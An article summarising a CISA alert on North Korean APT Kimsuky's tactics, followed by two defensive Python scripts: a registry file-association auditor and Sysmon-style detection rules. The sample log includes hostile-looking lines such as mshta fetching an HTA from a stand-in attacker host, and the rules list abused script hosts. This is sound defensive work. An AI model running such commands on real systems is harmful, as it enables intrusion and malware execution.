North Korean APT Group ‘Kimsuky’ Hack Techniques and Method

APT Kimsuky Malware Attack Vector

The North Korean advanced persistent threat (APT) group known as Kimsuky is actively attacking commercial-sector businesses, often by posing as South Korean reporters, according to an alert from the U.S. Cybersecurity and Infrastructure Security Agency (CISA). This week CISA, part of the Department of Homeland Security, issued Alert AA20-301A, titled "North Korean Advanced Persistent Threat Focus: Kimsuky", warning U.S. businesses, and particularly those in the commercial sector, about the tactics used by the Kimsuky APT group.

Kimsuky (known as Hidden Cobra) has been operating as a cyberespionage group since 2012 under the auspices of the regime in Pyongyang. Its mission is global intelligence gathering, CISA noted, which usually starts with spear phishing emails, watering-hole attacks, torrent shares and malicious browser extensions in order to gain an initial foothold in target networks. These terms are explained in Social Engineering – The Art of Hacking. Primary targets include diplomatic and high-level organizations in Japan, South Korea and the United States, with a focus on foreign policy and national-security issues related to the Korean peninsula, nuclear policy and sanctions, CISA added. It also targets the cryptocurrency industry. CISA, FBI, and CNMF recommend that targeted individuals and organizations increase their defenses and adopt a heightened state of awareness. Particularly important mitigations include safeguards against spear phishing, multi-factor authentication, and user awareness training.

APT Hack Tactics

Initial Access

  • Kimsuky gained initial access to victims' networks through a variety of spear phishing methods. Spear phishing is the most commonly observed and best known Kimsuky tactic.
  • The APT stole credentials from victims that were not its usual targets and used them to host its malicious scripts and tools. These credentials were most likely obtained through spear phishing and credential-harvesting scripts.
  • Subdomains were created that mimicked the victims' domains. To build trust, Kimsuky also sent emails containing malicious links and, pretending to be South Korean reporters, sent many interview-style emails to build rapport.
  • Targets were then invited to Skype interviews to discuss Korean issues. After the victim agreed to the interview, malware was sent as an attachment, and the interview was later cancelled.
  • Kimsuky approaches targets with topics that are relevant to them. Other methods include login-security-alert-themed phishing emails, watering hole attacks, distributing malware through torrent sharing sites, and directing victims to install malicious browser extensions.

Implementation

After gaining initial access, Kimsuky most likely uses the BabyShark malware or the command shell to execute its tooling. BabyShark is Visual Basic Script (VBS) based malware. The breakdown is as follows:

  1. First, the compromised host system uses the native Microsoft Windows utility mshta.exe to download and execute an HTML application (HTA) file from a remote system.
  2. The HTA file then downloads, decodes, and executes the encoded BabyShark VBS file.
  3. The script maintains persistence by creating a Registry key that runs on startup.
  4. It then collects system information, sends it to the operator's command and control servers, and awaits further commands.

Open-source reporting indicates that BabyShark is delivered via an email message containing a link or an attachment. Kimsuky tailors its phishing messages to match its targets' interests. Kimsuky also uses PowerShell to run executables fetched from the internet directly in the target's memory, without ever writing them to the computer's hard disk. PowerShell scripts can be executed without invoking powershell.exe, through HTA files or mshta.exe.

Persistence

Kimsuky has demonstrated the ability to establish persistence by using malicious browser extensions, modifying system processes, manipulating autostart execution, using Remote Desktop Protocol (RDP), and changing the default file association for an application. By using these methods, Kimsuky (a.k.a. Hidden Cobra) can gain login and password information and/or launch malware outside the reach of some application allowlisting solutions.

Sometime in 2018, Kimsuky used an extension on the Google Chrome Web Store to infect victims and steal passwords and cookies from their browsers. The extension had a five-star rating; however, the text of the reviews suggests they were most likely left by compromised Google+ accounts.

By mimicking a related operating system function or disguising itself as legitimate software, Kimsuky may install a new service that runs at startup, either by using utilities that interact with services or by directly modifying the Registry keys.

During the Stolen Pencil operation in May 2018, Kimsuky used the Grease malware, a tool that can add a Windows administrator account and enable RDP while bypassing firewall rules. Kimsuky also uses a document stealer module that changes the default program associated with Hangul Word Processor (HWP, a Korean word processor) documents in the Registry. Kimsuky manipulates the default Registry setting so that a malicious program opens HWP documents instead of the original HWP program: the malware reads and emails the content of the HWP document before the real HWP program opens it. The same method is also used against Microsoft Office users.

Kimsuky maintains access to compromised domains by uploading actor-modified versions of open-source PHP (Hypertext Preprocessor) based web shells, which enable the APT actor to upload, download, and delete files and directories on the compromised domains.
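The HWP default-handler hijack described above works by rewriting the file-association chain under HKEY_CLASSES_ROOT: the extension key points to a ProgID, and the ProgID's shell\open\command value names the program that opens the document. One defensive check is to resolve that chain from a registry export and flag handlers that live outside the expected install directories. The script below is an added example, not code from the original article or from CISA; it parses a constructed .reg export (the ProgIDs, paths and the list of trusted install prefixes are assumptions) and audits .hwp alongside .docx, since the article notes that the same method is used against Microsoft Office users.

```python
"""Audit file-association handlers from a Windows .reg export.

Added example (not from the article or CISA). Resolves
HKEY_CLASSES_ROOT\\<ext> -> ProgID -> shell\\open\\command and flags handler
executables that live outside the assumed install directories, which is
what a swapped HWP/Office handler in the Registry would look like.
"""
import re
from typing import Dict, List, Optional, Tuple

# Assumption: legitimate document handlers are installed under these prefixes.
INSTALL_PREFIXES = ("c:\\program files\\", "c:\\program files (x86)\\", "c:\\windows\\")


def parse_reg_defaults(text: str) -> Dict[str, str]:
    """Map each key path (lower-cased) to its default '@' value from a .reg export."""
    defaults: Dict[str, str] = {}
    current: Optional[str] = None
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
        elif current and line.startswith('@="') and line.endswith('"'):
            # .reg escapes backslashes and quotes inside string values.
            defaults[current] = re.sub(r'\\(["\\])', r"\1", line[3:-1])
    return defaults


def handler_executable(command: str) -> str:
    """Extract the executable path from a shell\\open\\command value."""
    command = command.strip()
    if command.startswith('"'):
        end = command.find('"', 1)
        return command[1:end] if end > 0 else command[1:]
    return command.split()[0] if command else ""


def resolve_handler(defaults: Dict[str, str], ext: str) -> Optional[str]:
    """Follow extension -> ProgID -> open command; None if the chain is incomplete."""
    progid = defaults.get(f"hkey_classes_root\\{ext.lower()}")
    if not progid:
        return None
    return defaults.get(f"hkey_classes_root\\{progid.lower()}\\shell\\open\\command")


def audit_associations(text: str, extensions: List[str]) -> Dict[str, Tuple[str, str]]:
    """Return {ext: (verdict, handler_exe)} with verdict ok / suspicious / missing."""
    defaults = parse_reg_defaults(text)
    results: Dict[str, Tuple[str, str]] = {}
    for ext in extensions:
        command = resolve_handler(defaults, ext)
        if command is None:
            results[ext] = ("missing", "")
            continue
        exe = handler_executable(command)
        verdict = "ok" if exe.lower().startswith(INSTALL_PREFIXES) else "suspicious"
        results[ext] = (verdict, exe)
    return results


# Constructed .reg export: .hwp has been re-pointed at a program in the user's
# profile, while .docx still opens with Word from its install directory.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

[HKEY_CLASSES_ROOT\.hwp]
@="Hwp.Document.9"

[HKEY_CLASSES_ROOT\Hwp.Document.9\shell\open\command]
@="\"C:\\Users\\alice\\AppData\\Roaming\\HncUpdate\\hwpview.exe\" \"%1\""

[HKEY_CLASSES_ROOT\.docx]
@="Word.Document.12"

[HKEY_CLASSES_ROOT\Word.Document.12\shell\open\command]
@="\"C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE\" /n \"%1\""
'''

if __name__ == "__main__":
    for ext, (verdict, exe) in audit_associations(SAMPLE_REG, [".hwp", ".docx", ".pdf"]).items():
        print(f"{ext:6} {verdict:10} {exe}")
```

Export the real keys with `reg export HKCR\.hwp` and the ProgID key on a suspect host and feed the file to `audit_associations`. The verdict is only as good as the prefix list: per-user installs that legitimately live under AppData will show as suspicious, so treat the output as a triage list and compare the handler against a known-good baseline from a clean machine.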

Privilege Escalation

Privilege escalation is the act of exploiting a bug, design flaw or configuration oversight in an operating system or software application to gain elevated access to resources that are normally protected from an application or user. Kimsuky uses well-known privilege escalation methods, including placing scripts in the Startup folder, creating and running new services, changing default file associations, and injecting malicious code into explorer.exe. The following methods were primarily used:

  1. Kimsuky has used Win7Elevate, an exploit from the Metasploit framework, to bypass User Account Control and inject malicious code into explorer.exe. Regardless of the victim's operating system, this malicious code decrypts its spying library from its resources, saves the decrypted file to disk under a random but hardcoded name in the user's temporary folder, and loads that file as a library, so the tools remain on the system even after a reboot. This process thereby grants escalated privileges.
  2. Before the injection takes place, the malware sets the necessary privileges. It then writes the path to its malicious Dynamic Link Library (DLL) and ensures it is loaded by creating a remote thread within explorer.exe.
[Image: Kimsuky MSHTA privilege]
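The execution chain in the Implementation section (mshta.exe fetching a remote HTA, the HTA launching a script host, a Run key for persistence) and the explorer.exe remote-thread injection just described each leave a distinct trace in endpoint telemetry. The following Python script is an added example, not code from the original article or from CISA: it runs four detection rules over a handful of constructed JSON event lines modelled on Sysmon Event ID 1 (process create), 13 (registry value set) and 8 (CreateRemoteThread). The field names follow Sysmon, but the hostnames, paths, SID and the trusted-source allowlist are assumptions.

```python
"""Detection rules for the Kimsuky execution and injection chain.

Added example (not from the article or CISA). Scans JSON event lines
modelled on Sysmon Event ID 1 (process create), 13 (registry value set)
and 8 (CreateRemoteThread) and reports which rule each event trips.
"""
import json
import re
from typing import Dict, List, Tuple

REMOTE_URL = re.compile(r"https?://", re.IGNORECASE)
# Script hosts commonly named in Run-key values by script-based malware.
SCRIPT_HOSTS = ("mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "rundll32.exe", "regsvr32.exe")
# Assumption: only binaries from these directories may open threads in explorer.exe.
TRUSTED_SOURCE_PREFIXES = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\")


def _basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_event(ev: Dict) -> List[Tuple[str, str]]:
    """Return [(rule_name, detail)] for one event dict; empty when nothing matches."""
    hits: List[Tuple[str, str]] = []
    try:
        eid = int(ev.get("EventID", 0))
    except (TypeError, ValueError):
        return hits
    if eid == 1:
        image = _basename(ev.get("Image", ""))
        parent = _basename(ev.get("ParentImage", ""))
        cmd = ev.get("CommandLine", "")
        # Step 1 of the BabyShark chain: mshta.exe pulling an HTA from a remote host.
        if image == "mshta.exe" and REMOTE_URL.search(cmd):
            hits.append(("mshta_remote_hta", cmd))
        # PowerShell launched by the HTA host rather than by a user shell.
        if image == "powershell.exe" and parent == "mshta.exe":
            hits.append(("powershell_from_mshta", cmd))
    elif eid == 13:
        target = ev.get("TargetObject", "")
        details = str(ev.get("Details", ""))
        # Step 3: autostart via a Run/RunOnce value that points at a script host.
        if "\\currentversion\\run" in target.lower() and any(h in details.lower() for h in SCRIPT_HOSTS):
            hits.append(("run_key_script_host", f"{target} = {details}"))
    elif eid == 8:
        src = ev.get("SourceImage", "")
        # Privilege-escalation step: a remote thread created inside explorer.exe
        # by a binary outside the trusted system directories.
        if _basename(ev.get("TargetImage", "")) == "explorer.exe" and not src.lower().startswith(TRUSTED_SOURCE_PREFIXES):
            hits.append(("remote_thread_into_explorer", src))
    return hits


def scan(lines) -> List[Tuple[str, str]]:
    """Run check_event over an iterable of JSON lines, skipping blank or malformed ones."""
    findings: List[Tuple[str, str]] = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            ev = json.loads(line)
        except json.JSONDecodeError:
            continue
        findings.extend(check_event(ev))
    return findings


# Constructed sample events (hostnames, paths and SID are made up).
SAMPLE_LOG = r'''
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe http://attacker.invalid/update.hta", "ParentImage": "C:\\Program Files\\Microsoft Office\\root\\Office16\\WINWORD.EXE"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", "CommandLine": "powershell.exe -NoProfile -WindowStyle Hidden", "ParentImage": "C:\\Windows\\System32\\mshta.exe"}
{"EventID": 1, "Image": "C:\\Windows\\System32\\mshta.exe", "CommandLine": "mshta.exe C:\\Users\\alice\\AppData\\Local\\Temp\\setup.hta", "ParentImage": "C:\\Windows\\explorer.exe"}
{"EventID": 13, "TargetObject": "HKU\\S-1-5-21-1000-2000-3000-1001\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\Updater", "Details": "wscript.exe //B C:\\Users\\alice\\AppData\\Roaming\\update.vbs"}
{"EventID": 13, "TargetObject": "HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run\\SecurityHealth", "Details": "C:\\Windows\\System32\\SecurityHealthSystray.exe"}
{"EventID": 8, "SourceImage": "C:\\Users\\alice\\AppData\\Local\\Temp\\svchost.exe", "TargetImage": "C:\\Windows\\explorer.exe"}
{"EventID": 8, "SourceImage": "C:\\Windows\\System32\\csrss.exe", "TargetImage": "C:\\Windows\\explorer.exe"}
'''

if __name__ == "__main__":
    for rule, detail in scan(SAMPLE_LOG.splitlines()):
        print(f"{rule:28} {detail}")
```

Two caveats follow from the article itself. Rule 2 depends on powershell.exe actually being spawned; because an HTA can run PowerShell logic without invoking powershell.exe, rule 1 (mshta.exe reaching out to a URL) is the one that still fires in that case, and a locally dropped HTA (the third sample event) is deliberately left to a separate rule. The explorer.exe allowlist will also flag legitimate software that opens threads in the shell, so tune the prefixes to the environment before alerting on rule 4.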
